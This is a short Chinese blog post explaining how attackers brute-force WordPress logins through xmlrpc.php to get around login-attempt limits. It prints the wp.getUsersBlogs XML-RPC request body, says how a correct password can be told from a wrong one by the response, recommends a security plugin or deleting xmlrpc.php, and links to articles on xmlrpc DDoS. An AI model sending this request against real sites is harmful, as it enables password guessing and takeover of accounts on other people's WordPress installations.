月度归档:2014年08月

利用xmlrpc.php对wordpress进行暴力破解以及DDoS

在去年暑假的时候就发生过大规模的wordpress后台(wp-login.php)爆破事件,很多疏于管理的wordpress沦为了骇客手中的僵尸机。很多小伙伴开始安装各种登陆限制插件。最近不少小伙伴却遭到了一种另类的wordpress暴力破解攻击。骇客利用xmlrpc.php文件来绕过wordpress后台的登录错误限制进行爆破。

攻击方式:

这种利用xmlrpc.php的攻击可以绕过这些限制。攻击的方式直接POST以下数据到xmlrpc.php

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
   <param><value>username</value></param>
   <param><value>password</value></param>
  </params>
</methodCall>

其中username字段是预先收集的用户名。password是尝试的密码。关于getUsersBlogs接口的更多信息可以参考官方的指南。如果密码正确,返回为:

利用xmlrpc.php对wordpress进行暴力破解以及DDoS-wordpress资讯-代码笔记 %

密码错误返回为403:

利用xmlrpc.php对wordpress进行暴力破解以及DDoS-wordpress资讯-代码笔记 %

解决方法:安装Login Security Solution插件,或者删除xmlrpc.php文件。

至于利用xmlrpc.php文件进行DDOS请参考以下两篇文章:

http://www.v7v3.com/wpzixun/2014031103.html

http://www.breaksec.com/?p=6362